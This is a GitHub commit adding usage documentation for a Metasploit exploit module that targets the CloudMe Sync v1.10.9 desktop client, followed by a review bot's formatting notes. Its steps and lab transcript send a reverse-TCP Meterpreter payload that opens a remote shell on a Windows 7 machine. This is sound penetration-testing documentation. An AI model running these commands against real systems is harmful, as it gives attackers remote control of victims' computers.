CloudMe Sync Client documentation

MS-2855/keylogger-mettle-extension
Daniel Teixeira 2018-02-20 21:56:31 +00:00 committed by GitHub
parent 651ddbb7eb
commit ff3b318abd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 66 additions and 0 deletions

@ -0,0 +1,66 @@
## Verification Steps
1. Install CloudMe for Desktop version `v1.10.9`
2. Create a free account and start the applicaton
6. Start `msfconsole`
4. Do `use exploit/windows/misc/cloudme_sync`
5. Do `set RHOST ip`
11. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
12. Do `set LHOST ip`
13. Do `exploit`
14. Verify the Meterpreter session is opened
## Scenarios
### CloudMe Sync client application on Windows 7 SP1
```
msf > use exploit/windows/misc/cloudme_sync
msf exploit(windows/misc/cloudme_sync) > show options
Module options (exploit/windows/misc/cloudme_sync):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.40.148 yes The target address
RPORT 8888 yes The target port (TCP)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.40.5 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 CloudMe Sync v1.10.9
msf exploit(windows/misc/cloudme_sync) > set RHOST 172.16.40.148
RHOST => 172.16.40.148
msf exploit(windows/misc/cloudme_sync) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/misc/cloudme_sync) > set LHOST 172.16.40.5
LHOST => 172.16.40.5
msf exploit(windows/misc/cloudme_sync) > exploit
[*] Started reverse TCP handler on 172.16.40.5:4444
[*] Sending stage (179779 bytes) to 172.16.40.148
[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.148:57185) at 2018-02-19 12:35:21 +0000
meterpreter > sysinfo
Computer : PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : pt_PT
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
```
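Review bot: The ordered list under "Verification Steps" is numbered 1, 2, 6, 4, 5, 11, 12, 13, 14 in the source; renumber it 1 through 9 so the raw file matches what Markdown renders, and fix the typo "applicaton" in step 2. The steps `set RHOST ip` and `set LHOST ip` use the same placeholder for two different hosts, so spell out which is the machine running CloudMe and which is the listener, as the scenario does with 172.16.40.148 and 172.16.40.5. The steps never mention the service port, although the scenario shows `RPORT 8888`; add a line stating that this is the default so a tester knows what to check if the client is not reachable. In the scenario, `show options` is printed before the `set` commands yet already lists RHOST and LHOST populated; move it after the `set` lines or drop the redundant ones so the transcript reads in the order it was run. A blank line after each `##` heading and before the list would also keep stricter Markdown renderers from folding the list into the heading.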